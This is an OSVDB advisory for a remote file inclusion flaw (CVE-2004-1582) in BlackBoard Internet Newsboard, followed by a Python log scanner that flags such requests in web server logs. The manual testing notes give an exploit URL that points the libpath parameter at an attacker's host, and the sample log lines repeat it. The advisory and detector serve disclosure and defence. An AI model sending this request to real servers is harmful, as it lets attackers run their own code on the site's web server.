Yves Goergen BlackBoard Internet Newsboard System checkdb.inc.php Arbitrary Command Execution

2004-10-06T00:00:00
ID OSVDB:10538
Type osvdb
Reporter Lin Xiaofeng (cracklove@gmail.com)
Modified 2004-10-06T00:00:00

Description

Vulnerability Description

Yves Goergen BlackBoard Internet Newsboard contains a flaw that may allow a malicious user to execute arbitrary commands on the server. The issue is triggered when "checkdb.inc.php" does not validate user-supplied input to the $libpath variable. This allows an attacker to include an arbitrary file from a remote server which contains commands that will be executed with the same privileges as the running web server.

Solution Description

Upgrade to version 1.5.1h or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

Yves Goergen BlackBoard Internet Newsboard contains a flaw that may allow a malicious user to execute arbitrary commands on the server. The issue is triggered when "checkdb.inc.php" does not validate user-supplied input to the $libpath variable. This allows an attacker to include an arbitrary file from a remote server which contains commands that will be executed with the same privileges as the running web server.

Manual Testing Notes

http://[victim]/bb_lib/checkdb.inc.php?libpath=http://[attacker]/
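
As an added illustration (not part of the advisory or the vendor's code), the following Python scans web server access logs in Common Log Format for the request pattern shown above: a hit on checkdb.inc.php whose libpath (or any other) query parameter decodes to a remote URL. The log lines and addresses are constructed, and the regular expression assumes Apache-style CLF.

```python
"""Flag remote-file-inclusion attempts against checkdb.inc.php in access logs."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Schemes PHP's include() fetches over the network when allow_url_fopen/allow_url_include permit it.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://")

# Common Log Format: client ident user [time] "METHOD PATH PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

def rfi_params(request_target):
    """Return [(name, decoded_value)] for query parameters that point at a remote URL."""
    query = urlsplit(request_target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded ':' and '/'.
        decoded = unquote(value).strip().lower()
        if decoded.startswith(REMOTE_SCHEMES):
            hits.append((name, decoded))
    return hits

def scan_log(lines):
    """Return (client, time, param, value) for each suspicious checkdb.inc.php request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF; skip rather than crash on a malformed line
        client, when, _method, target, _status = m.groups()
        if not urlsplit(target).path.lower().endswith("/checkdb.inc.php"):
            continue
        for name, value in rfi_params(target):
            findings.append((client, when, name, value))
    return findings

# Constructed sample log lines (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Oct/2004:10:01:02 +0000] "GET /bb_lib/checkdb.inc.php?libpath=http://198.51.100.7/ HTTP/1.0" 200 512',
    '203.0.113.5 - - [06/Oct/2004:10:01:03 +0000] "GET /bb_lib/checkdb.inc.php?libpath=HTTP%253A%252F%252F198.51.100.7%252F HTTP/1.0" 200 512',
    '198.51.100.20 - - [06/Oct/2004:10:02:00 +0000] "GET /index.php?board=1 HTTP/1.0" 200 2048',
    '198.51.100.20 - - [06/Oct/2004:10:02:30 +0000] "GET /bb_lib/checkdb.inc.php?libpath=../lib/ HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for client, when, name, value in scan_log(SAMPLE_LOG):
        print(f"{when} {client} remote include attempt via {name}={value}")
```

The fourth sample line (a local "../lib/" value) is deliberately not flagged: this advisory concerns remote inclusion, and a traversal check would be a separate rule.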

References:

Vendor URL: http://blackboard.unclassified.de/download.php
Security Tracker: 1011551
Secunia Advisory ID: 12757
Other Advisory URL: http://blackboard.unclassified.de/70,1#1031
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-10/0044.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-10/0057.html
Keyword: Remote File Inclusion
CVE ID: CVE-2004-1582